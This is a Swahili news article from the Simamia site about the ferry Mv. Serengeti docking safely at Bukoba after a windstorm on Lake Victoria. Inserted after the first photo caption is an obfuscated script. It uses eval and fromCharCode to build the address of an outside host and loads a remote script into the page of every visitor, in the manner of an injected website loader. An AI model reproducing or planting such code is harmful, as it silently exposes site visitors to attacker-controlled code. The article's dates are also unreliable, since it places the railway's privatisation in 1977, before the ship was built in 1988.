Recent Comments

Mv Serengeti Yanusurika kuzama

By Baraka Bitariho Aug 17, 2015
<p>Abilia wakiongea na wandishi wa habari mara tu meli ilipofanikiwa kutia nanga katika bandari ya Bukoba</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Mv. Serengeti
Mv. Serengeti

Pichani ni Meli ya Mv. Serengeti iliyopigwa na dhoruba leo asubuhi tarehe 17 August, 2015. Upepo mkali ulisababisha Mv. Serengeti kutia nanga kwenye bandari ya Bukoba, mkoani Kagera.

Nahodha Bembele Mwita amesema ilimbidi arudishe meli hiyo kwenye maji yenye kina kirefu na ambapo upepo umetulia. Pia, ameambia wandishi wetu kuwa Mv. Serengeti haina tatizo lolote la kiufundi.

Chombo cha majini huwa inapata balance nzuri kwenye kina kirefu. Hapo baadae iliweza kutia nanga kwenye andari ya Bukoba majira ya saa tano asubuhi na abilia wote wakiwa salama.

Abilia wakiongea na wandishi wa habari mara tu meli ilipofanikiwa kutia nanga katika bandari ya Bukoba
Abilia wakiongea na wandishi wa habari mara tu meli ilipofanikiwa kutia nanga katika bandari ya Bukoba

Wakizungumza na wandish wa habari baada kushuka kwa usalama katika bandari ya Bukoba, baadhi abilia walisema meli hiyo ilianza kuyumba majini majira ya saa kumi na moja alfajiri. Iliwabidi wakae majini kwa Zaidi ya masaa sita wakisubiri upepo utulie. Kitendo cha kuyumba kwa meli na cha kusubiri majini kwa masaa yote kiliwatia abilia wasi wasi na hali hali mbaya ya kisaikorojia.

Mv. Serengeti hufanya shughulika kwenye ziwa Victoria kati ya bandari ya Mwanza na Bukoba. Inauwezo wa kubeba abilia 593 na tani 350 za mizigo. Inaurefu wa meta 55.6 na kwa ujumla inaweza kubeba uzizito wa tani 975.

Mv. Serengeti inamilikiwa na kuendeshwa na Marine Services Company Limited. Inatumia mafuta aina ya Diesel. Ilitengenezwa mwaka 1988 kwa ajiri ya shilika la Tanzania Railways Corporation (TRC). TRC ilibinafsishwa mwaka1977.

Mv. Serengeti imekua inafanya kazi misafa kati ya Bukoba na Mwanza baada ya meli iliyokuwepo, Mv. Victoria, kusimamishwa kwa ajiri ya matengenezo miezi miwili iliyopita.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com